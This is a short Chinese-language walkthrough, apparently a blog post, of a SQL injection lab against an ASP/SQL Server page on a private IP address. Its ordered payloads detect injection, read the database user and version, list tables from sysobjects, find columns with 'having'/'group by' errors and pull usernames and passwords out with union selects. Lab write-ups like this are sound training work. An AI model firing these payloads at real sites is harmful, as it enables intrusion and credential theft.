(1).在第⼀关使⽤单双引号判断是否存在注⼊,根据报错的回显可知数据类型为字符型
http://192.168.0.141/less-1.asp?id=1
http://192.168.0.141/less-1.asp?id=1'
http://192.168.0.141/less-1.asp?id=1' --
(2)查询数据库信息,user回显的dbo表示是最⾼权限,如果是⽤户的名字表示是普通权限
union select user,null,null user:查询⽤户
db_name():查询数据库名
@@version:查询版本信息
(3)通过以下语句来猜解有哪些表...从⽽获取⽬标站点的表信息...
'and (select top 1 cast (name as varchar(256)) from(select top 2 id,name from [sysobjects] where xtype=char(85) and status!=1 order by id) order by id desc)=1--
xtype=char(85) //xtype=字符的ASCII值
#查看不存在表名,返回其他表信息
第⼆张表:-1'and 1=(select top 1 name from sysobjects where xtype='U' and n ame !='users')-- //emails
第三张表:-1'and 1=(select top 1 name from sysobjects where xtype='U' and n ame !='users' and name !='emails')-- //uagents
第四张表:-1'and 1=(select top 1 name from sysobjects where xtype='U' and n ame !='users' and name !='emails' and name !='uagents')-- //referers
第五张表:-1'and 1=(select top 1 name from sysobjects where xtype='U' and n ame !='users' and name !='emails' and name !='uagents' and name !='referer s')-- //返回结果为空,说明不知道第五张表
(4)通过以下语句爆出表下的所有字段信息..
#payload
'having 1=1-- 'group by 字段名1 having 1=1--
'group by 字段名1,字段名2 having 1=1--
#字段名
id,username,password
(5)爆字段值.
#查询字段数据
1'order by 3-- //回显正常
1'order by 4-- //回信错误
#回显存在内容的字段
-1'union select 1,2,3 from users--
#查询字段内容
-1' union all select 1,(select top 1 username from users),'3'--
-1' union all select 1,2,(select top 1 password from users)--
159
被折叠的 条评论
为什么被折叠?
到【灌水乐园】发言
